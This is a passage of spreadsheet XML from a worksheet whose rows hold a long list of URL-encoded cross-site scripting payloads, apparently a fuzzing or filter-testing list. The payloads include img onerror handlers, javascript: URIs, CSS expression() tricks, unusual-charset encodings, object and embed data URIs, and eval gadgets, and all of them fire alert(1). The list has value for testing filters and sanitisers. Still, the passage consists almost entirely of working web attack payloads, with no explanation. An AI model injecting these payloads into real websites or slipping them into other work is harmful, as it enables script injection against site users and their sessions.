      </c>
    </row>
    <row r="1654">
      <c r="A1654" s="3" t="s">
        <v>293</v>
      </c>
      <c r="B1654" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cli%20style%3Dlist-style%3Aurl%28%29%20onerror%3Djavascript%3Aalert%281%29%3E%20%3Cdiv%20style%3Dcontent%3Aurl%28data%3Aimage%2Fsvg%2Bxml%2C%25%253Csvg%2F%25%253E%29%3Bvisibility%3Ahidden%20onload%3Djavascript%3Aalert%281%29%3E%3C%2Fdiv%3E</v>
      </c>
    </row>
    <row r="1655">
      <c r="A1655" s="3" t="s">
        <v>294</v>
      </c>
      <c r="B1655" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chead%3E%3Cbase%20href%3D%22javascript%3A%2F%2F%22%3E%3C%2Fhead%3E%3Cbody%3E%3Ca%20href%3D%22%2F.%20%2F%2Cjavascript%3Aalert%281%29%2F%2F%23%22%3EXXX%3C%2Fa%3E%3C%2Fbody%3E</v>
      </c>
    </row>
    <row r="1656">
      <c r="A1656" s="3" t="s">
        <v>295</v>
      </c>
      <c r="B1656" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20FOR%3Ddocument%20EVENT%3Donreadystatechange%3Ejavascript%3Aalert%281%29%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1657">
      <c r="A1657" s="3" t="s">
        <v>296</v>
      </c>
      <c r="B1657" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3COBJECT%20CLASSID%3D%22clsid%3A333C7BC4-460F-11D0-BC04-0080C7055A83%22%3E%3CPARAM%20NAME%3D%22DataURL%22%20VALUE%3D%22javascript%3Aalert%281%29%22%3E%3C%2FOBJECT%3E</v>
      </c>
    </row>
    <row r="1658">
      <c r="A1658" s="3" t="s">
        <v>297</v>
      </c>
      <c r="B1658" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20data%3D%22data%3Atext%2Fhtml%3Bbase64%2C%25%28base64%29s%22%3E</v>
      </c>
    </row>
    <row r="1659">
      <c r="A1659" s="3" t="s">
        <v>298</v>
      </c>
      <c r="B1659" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20src%3D%22data%3Atext%2Fhtml%3Bbase64%2C%25%28base64%29s%22%3E</v>
      </c>
    </row>
    <row r="1660">
      <c r="A1660" s="3" t="s">
        <v>299</v>
      </c>
      <c r="B1660" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cb%20%3Cscript%3Ealert%281%29%3C%2Fscript%3E0</v>
      </c>
    </row>
    <row r="1661">
      <c r="A1661" s="3" t="s">
        <v>300</v>
      </c>
      <c r="B1661" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20id%3D%22div1%22%3E%3Cinput%20value%3D%22%60%60onmouseover%3Djavascript%3Aalert%281%29%22%3E%3C%2Fdiv%3E%20%3Cdiv%20id%3D%22div2%22%3E%3C%2Fdiv%3E%3Cscript%3Edocument.getElementById%28%22div2%22%29.innerHTML%20%3D%20document.getElementById%28%22div1%22%29.innerHTML%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1662">
      <c r="A1662" s="3" t="s">
        <v>301</v>
      </c>
      <c r="B1662" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cx%20%27%3D%22foo%22%3E%3Cx%20foo%3D%27%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%281%29%2F%2F%27%3E</v>
      </c>
    </row>
    <row r="1663">
      <c r="A1663" s="3" t="s">
        <v>302</v>
      </c>
      <c r="B1663" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20src%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1664">
      <c r="A1664" s="3" t="s">
        <v>303</v>
      </c>
      <c r="B1664" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1665">
      <c r="A1665" s="3" t="s">
        <v>304</v>
      </c>
      <c r="B1665" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimage%20src%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1666">
      <c r="A1666" s="3" t="s">
        <v>305</v>
      </c>
      <c r="B1666" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1667">
      <c r="A1667" s="3" t="s">
        <v>306</v>
      </c>
      <c r="B1667" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3Dwidth%3A1px%3Bfilter%3Aglow%20onfilterchange%3Djavascript%3Aalert%281%29%3Ex</v>
      </c>
    </row>
    <row r="1668">
      <c r="A1668" s="3" t="s">
        <v>307</v>
      </c>
      <c r="B1668" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3F%20foo%3D%22%3E%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="1669">
      <c r="A1669" s="3" t="s">
        <v>308</v>
      </c>
      <c r="B1669" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21%20foo%3D%22%3E%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="1670">
      <c r="A1670" s="3" t="s">
        <v>309</v>
      </c>
      <c r="B1670" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2F%20foo%3D%22%3E%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="1671">
      <c r="A1671" s="3" t="s">
        <v>310</v>
      </c>
      <c r="B1671" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3F%20foo%3D%22%3E%3Cx%20foo%3D%27%3F%3E%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E%27%3E%22%3E</v>
      </c>
    </row>
    <row r="1672">
      <c r="A1672" s="3" t="s">
        <v>311</v>
      </c>
      <c r="B1672" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21%20foo%3D%22%5B%5B%5BInception%5D%5D%22%3E%3Cx%20foo%3D%22%5Dfoo%3E%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="1673">
      <c r="A1673" s="3" t="s">
        <v>312</v>
      </c>
      <c r="B1673" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%25%20foo%3E%3Cx%20foo%3D%22%25%3E%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="1674">
      <c r="A1674" s="3" t="s">
        <v>313</v>
      </c>
      <c r="B1674" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20id%3Dd%3E%3Cx%20xmlns%3D%22%3E%3Ciframe%20onload%3Djavascript%3Aalert%281%29%22%3E%3C%2Fdiv%3E%20%3Cscript%3Ed.innerHTML%3Dd.innerHTML%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1675">
      <c r="A1675" s="3" t="s">
        <v>314</v>
      </c>
      <c r="B1675" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20%5Cx00src%3Dx%20onerror%3D%22alert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1676">
      <c r="A1676" s="3" t="s">
        <v>315</v>
      </c>
      <c r="B1676" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20%5Cx47src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1677">
      <c r="A1677" s="3" t="s">
        <v>316</v>
      </c>
      <c r="B1677" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20%5Cx11src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1678">
      <c r="A1678" s="3" t="s">
        <v>317</v>
      </c>
      <c r="B1678" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20%5Cx12src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1679">
      <c r="A1679" s="3" t="s">
        <v>318</v>
      </c>
      <c r="B1679" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%5Cx47src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1680">
      <c r="A1680" s="3" t="s">
        <v>319</v>
      </c>
      <c r="B1680" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%5Cx10src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1681">
      <c r="A1681" s="3" t="s">
        <v>320</v>
      </c>
      <c r="B1681" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%5Cx13src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1682">
      <c r="A1682" s="3" t="s">
        <v>321</v>
      </c>
      <c r="B1682" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%5Cx32src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1683">
      <c r="A1683" s="3" t="s">
        <v>318</v>
      </c>
      <c r="B1683" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%5Cx47src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1684">
      <c r="A1684" s="3" t="s">
        <v>322</v>
      </c>
      <c r="B1684" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%5Cx11src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1685">
      <c r="A1685" s="3" t="s">
        <v>315</v>
      </c>
      <c r="B1685" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20%5Cx47src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1686">
      <c r="A1686" s="3" t="s">
        <v>323</v>
      </c>
      <c r="B1686" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20%5Cx34src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1687">
      <c r="A1687" s="3" t="s">
        <v>324</v>
      </c>
      <c r="B1687" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20%5Cx39src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1688">
      <c r="A1688" s="3" t="s">
        <v>325</v>
      </c>
      <c r="B1688" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20%5Cx00src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1689">
      <c r="A1689" s="3" t="s">
        <v>326</v>
      </c>
      <c r="B1689" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%5Cx09%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1690">
      <c r="A1690" s="3" t="s">
        <v>327</v>
      </c>
      <c r="B1690" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%5Cx10%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1691">
      <c r="A1691" s="3" t="s">
        <v>328</v>
      </c>
      <c r="B1691" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%5Cx13%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1692">
      <c r="A1692" s="3" t="s">
        <v>329</v>
      </c>
      <c r="B1692" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%5Cx32%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1693">
      <c r="A1693" s="3" t="s">
        <v>330</v>
      </c>
      <c r="B1693" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%5Cx12%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1694">
      <c r="A1694" s="3" t="s">
        <v>331</v>
      </c>
      <c r="B1694" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%5Cx11%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1695">
      <c r="A1695" s="3" t="s">
        <v>332</v>
      </c>
      <c r="B1695" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%5Cx00%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1696">
      <c r="A1696" s="3" t="s">
        <v>333</v>
      </c>
      <c r="B1696" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%5Cx47%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1697">
      <c r="A1697" s="3" t="s">
        <v>334</v>
      </c>
      <c r="B1697" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%5Cx09onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1698">
      <c r="A1698" s="3" t="s">
        <v>335</v>
      </c>
      <c r="B1698" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%5Cx10onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1699">
      <c r="A1699" s="3" t="s">
        <v>336</v>
      </c>
      <c r="B1699" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%5Cx11onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1700">
      <c r="A1700" s="3" t="s">
        <v>337</v>
      </c>
      <c r="B1700" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%5Cx12onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1701">
      <c r="A1701" s="3" t="s">
        <v>338</v>
      </c>
      <c r="B1701" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%5Cx13onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1702">
      <c r="A1702" s="3" t="s">
        <v>339</v>
      </c>
      <c r="B1702" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%5Ba%5D%5Bb%5D%5Bc%5Dsrc%5Bd%5D%3Dx%5Be%5Donerror%3D%5Bf%5D%22alert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1703">
      <c r="A1703" s="3" t="s">
        <v>340</v>
      </c>
      <c r="B1703" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%20onerror%3D%5Cx09%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1704">
      <c r="A1704" s="3" t="s">
        <v>341</v>
      </c>
      <c r="B1704" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%20onerror%3D%5Cx10%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1705">
      <c r="A1705" s="3" t="s">
        <v>342</v>
      </c>
      <c r="B1705" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%20onerror%3D%5Cx11%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1706">
      <c r="A1706" s="3" t="s">
        <v>343</v>
      </c>
      <c r="B1706" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%20onerror%3D%5Cx12%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1707">
      <c r="A1707" s="3" t="s">
        <v>344</v>
      </c>
      <c r="B1707" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%20onerror%3D%5Cx32%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1708">
      <c r="A1708" s="3" t="s">
        <v>345</v>
      </c>
      <c r="B1708" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%20onerror%3D%5Cx00%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1709">
      <c r="A1709" s="3" t="s">
        <v>346</v>
      </c>
      <c r="B1709" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3Djava%26%231%26%232%26%233%26%234%26%235%26%236%26%237%26%238%26%2311%26%2312script%3Ajavascript%3Aalert%281%29%3EXXX%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1710">
      <c r="A1710" s="3" t="s">
        <v>347</v>
      </c>
      <c r="B1710" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22x%60%20%60%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E%22%60%20%60%3E</v>
      </c>
    </row>
    <row r="1711">
      <c r="A1711" s="3" t="s">
        <v>348</v>
      </c>
      <c r="B1711" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%20onerror%20%2F%22%20%27%22%3D%20alt%3Djavascript%3Aalert%281%29%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="1712">
      <c r="A1712" s="3" t="s">
        <v>349</v>
      </c>
      <c r="B1712" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ctitle%20onpropertychange%3Djavascript%3Aalert%281%29%3E%3C%2Ftitle%3E%3Ctitle%20title%3D%3E</v>
      </c>
    </row>
    <row r="1713">
      <c r="A1713" s="3" t="s">
        <v>350</v>
      </c>
      <c r="B1713" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3Dhttp%3A%2F%2Ffoo.bar%2F%23x%3D%60y%3E%3C%2Fa%3E%3Cimg%20alt%3D%22%60%3E%3Cimg%20src%3Dx%3Ax%20onerror%3Djavascript%3Aalert%281%29%3E%3C%2Fa%3E%22%3E</v>
      </c>
    </row>
    <row r="1714">
      <c r="A1714" s="3" t="s">
        <v>351</v>
      </c>
      <c r="B1714" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%5Bif%5D%3E%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%20--%3E</v>
      </c>
    </row>
    <row r="1715">
      <c r="A1715" s="3" t="s">
        <v>352</v>
      </c>
      <c r="B1715" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%5Bif%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%281%29%2F%2F%5D%3E%20--%3E</v>
      </c>
    </row>
    <row r="1716">
      <c r="A1716" s="3" t="s">
        <v>353</v>
      </c>
      <c r="B1716" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22%2F%5C%25%28jscript%29s%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1717">
      <c r="A1717" s="3" t="s">
        <v>354</v>
      </c>
      <c r="B1717" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22%5C%5C%25%28jscript%29s%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1718">
      <c r="A1718" s="3" t="s">
        <v>355</v>
      </c>
      <c r="B1718" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20id%3D%22x%22%20classid%3D%22clsid%3ACB927D12-4FF7-4a9e-A169-56E4B8A75598%22%3E%3C%2Fobject%3E%20%3Cobject%20classid%3D%22clsid%3A02BF25D5-8C17-4B23-BC80-D3488ABDDC6B%22%20onqt_error%3D%22javascript%3Aalert%281%29%22%20style%3D%22behavior%3Aurl%28%23x%29%3B%22%3E%3Cparam%20name%3Dpostdomevents%20%2F%3E%3C%2Fobject%3E</v>
      </c>
    </row>
    <row r="1719">
      <c r="A1719" s="3" t="s">
        <v>356</v>
      </c>
      <c r="B1719" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20style%3D%22-o-link%3A%27javascript%3Ajavascript%3Aalert%281%29%27%3B-o-link-source%3Acurrent%22%3EX</v>
      </c>
    </row>
    <row r="1720">
      <c r="A1720" s="3" t="s">
        <v>357</v>
      </c>
      <c r="B1720" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3Ep%5Bfoo%3Dbar%7B%7D%2A%7B-o-link%3A%27javascript%3Ajavascript%3Aalert%281%29%27%7D%7B%7D%2A%7B-o-link-source%3Acurrent%7D%5D%7Bcolor%3Ared%7D%3B%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="1721">
      <c r="A1721" s="3" t="s">
        <v>358</v>
      </c>
      <c r="B1721" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Clink%20rel%3Dstylesheet%20href%3Ddata%3A%2C%2A%257bx%3Aexpression%28javascript%3Aalert%281%29%29%257d</v>
      </c>
    </row>
    <row r="1722">
      <c r="A1722" s="3" t="s">
        <v>359</v>
      </c>
      <c r="B1722" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%40import%20%22data%3A%2C%2A%257bx%3Aexpression%28javascript%3Aalert%281%29%29%257D%22%3B%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="1723">
      <c r="A1723" s="3" t="s">
        <v>360</v>
      </c>
      <c r="B1723" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20style%3D%22pointer-events%3Anone%3Bposition%3Aabsolute%3B%22%3E%3Ca%20style%3D%22position%3Aabsolute%3B%22%20onclick%3D%22javascript%3Aalert%281%29%3B%22%3EXXX%3C%2Fa%3E%3C%2Fa%3E%3Ca%20href%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3EXXX%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1724">
      <c r="A1724" s="3" t="s">
        <v>361</v>
      </c>
      <c r="B1724" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%2A%5B%7B%7D%40import%27%25%28css%29s%3F%5D%3C%2Fstyle%3EX</v>
      </c>
    </row>
    <row r="1725">
      <c r="A1725" s="3" t="s">
        <v>362</v>
      </c>
      <c r="B1725" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22font-family%3A%27foo%26%2310%3B%3Bcolor%3Ared%3B%27%3B%22%3EXXX</v>
      </c>
    </row>
    <row r="1726">
      <c r="A1726" s="3" t="s">
        <v>363</v>
      </c>
      <c r="B1726" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22font-family%3Afoo%7Dcolor%3Dred%3B%22%3EXXX</v>
      </c>
    </row>
    <row r="1727">
      <c r="A1727" s="3" t="s">
        <v>364</v>
      </c>
      <c r="B1727" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2F%2F%20style%3Dx%3Aexpression%5C28javascript%3Aalert%281%29%5C29%3E</v>
      </c>
    </row>
    <row r="1728">
      <c r="A1728" s="3" t="s">
        <v>365</v>
      </c>
      <c r="B1728" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%2A%7Bx%3A%EF%BD%85%EF%BD%98%EF%BD%90%EF%BD%92%EF%BD%85%EF%BD%93%EF%BD%93%EF%BD%89%EF%BD%8F%EF%BD%8E%28javascript%3Aalert%281%29%29%7D%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="1729">
      <c r="A1729" s="3" t="s">
        <v>366</v>
      </c>
      <c r="B1729" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3Dcontent%3Aurl%28%25%28svg%29s%29%3E%3C%2Fdiv%3E</v>
      </c>
    </row>
    <row r="1730">
      <c r="A1730" s="3" t="s">
        <v>367</v>
      </c>
      <c r="B1730" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22list-style%3Aurl%28http%3A%2F%2Ffoo.f%29%5C20url%28javascript%3Ajavascript%3Aalert%281%29%29%3B%22%3EX</v>
      </c>
    </row>
    <row r="1731">
      <c r="A1731" s="3" t="s">
        <v>368</v>
      </c>
      <c r="B1731" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20id%3Dd%3E%3Cdiv%20style%3D%22font-family%3A%27sans%5C27%5C3B%20color%5C3Ared%5C3B%27%22%3EX%3C%2Fdiv%3E%3C%2Fdiv%3E%20%3Cscript%3Ewith%28document.getElementById%28%22d%22%29%29innerHTML%3DinnerHTML%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1732">
      <c r="A1732" s="3" t="s">
        <v>369</v>
      </c>
      <c r="B1732" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22background%3Aurl%28%2Ff%23%26%23127%3Boo%2F%3Bcolor%3Ared%2F%2A%2Ffoo.jpg%29%3B%22%3EX</v>
      </c>
    </row>
    <row r="1733">
      <c r="A1733" s="3" t="s">
        <v>370</v>
      </c>
      <c r="B1733" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22font-family%3Afoo%7Bbar%3Bbackground%3Aurl%28http%3A%2F%2Ffoo.f%2Foo%7D%3Bcolor%3Ared%2F%2A%2Ffoo.jpg%29%3B%22%3EX</v>
      </c>
    </row>
    <row r="1734">
      <c r="A1734" s="3" t="s">
        <v>371</v>
      </c>
      <c r="B1734" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20id%3D%22x%22%3EXXX%3C%2Fdiv%3E%20%3Cstyle%3E%20%20%23x%7Bfont-family%3Afoo%5Bbar%3Bcolor%3Agreen%3B%7D%20%20%23y%5D%3Bcolor%3Ared%3B%7B%7D%20%20%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="1735">
      <c r="A1735" s="3" t="s">
        <v>372</v>
      </c>
      <c r="B1735" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cx%20style%3D%22background%3Aurl%28%27x%26%231%3B%3Bcolor%3Ared%3B%2F%2A%27%29%22%3EXXX%3C%2Fx%3E</v>
      </c>
    </row>
    <row r="1736">
      <c r="A1736" s="3" t="s">
        <v>373</v>
      </c>
      <c r="B1736" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%28%7Bset%2F%2A%2A%2F%24%28%24%29%7B_%2F%2A%2A%2Fsetter%3D%24%2C_%3Djavascript%3Aalert%281%29%7D%7D%29.%24%3Deval%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1737">
      <c r="A1737" s="3" t="s">
        <v>374</v>
      </c>
      <c r="B1737" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%28%7B0%3A%230%3Deval%2F%230%23%2F%230%23%28javascript%3Aalert%281%29%29%7D%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1738">
      <c r="A1738" s="3" t="s">
        <v>375</v>
      </c>
      <c r="B1738" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3EReferenceError.prototype.__defineGetter__%28%27name%27%2C%20function%28%29%7Bjavascript%3Aalert%281%29%7D%29%2Cx%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1739">
      <c r="A1739" s="3" t="s">
        <v>376</v>
      </c>
      <c r="B1739" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3EObject.__noSuchMethod__%20%3D%20Function%2C%5B%7B%7D%5D%5B0%5D.constructor._%28%27javascript%3Aalert%281%29%27%29%28%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1740">
      <c r="A1740" s="3" t="s">
        <v>377</v>
      </c>
      <c r="B1740" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20charset%3D%22x-imap4-modified-utf7%22%3E%26ADz%26AGn%26AG0%26AEf%26ACA%26AHM%26AHI%26AGO%26AD0%26AGn%26ACA%26AG8Abg%26AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ%26ACAAPABi</v>
      </c>
    </row>
    <row r="1741">
      <c r="A1741" s="3" t="s">
        <v>378</v>
      </c>
      <c r="B1741" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20charset%3D%22x-imap4-modified-utf7%22%3E%26%3Cscript%26S1%26TS%261%3Ealert%26A7%26%281%29%26R%26UA%3B%26%26%3C%26A9%2611%2Fscript%26X%26%3E</v>
      </c>
    </row>
    <row r="1742">
      <c r="A1742" s="3" t="s">
        <v>379</v>
      </c>
      <c r="B1742" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20charset%3D%22mac-farsi%22%3E%C2%BCscript%C2%BEjavascript%3Aalert%281%29%C2%BC%2Fscript%C2%BE</v>
      </c>
    </row>
    <row r="1743">
      <c r="A1743" s="3" t="s">
        <v>380</v>
      </c>
      <c r="B1743" s="4" t="str">
        <f t="shared" si="1"/>
        <v>X%3Cx%20style%3D%60behavior%3Aurl%28%23default%23time2%29%60%20onbegin%3D%60javascript%3Aalert%281%29%60%20%3E</v>
      </c>
    </row>
    <row r="1744">
      <c r="A1744" s="3" t="s">
        <v>381</v>
      </c>
      <c r="B1744" s="4" t="str">
        <f t="shared" si="1"/>
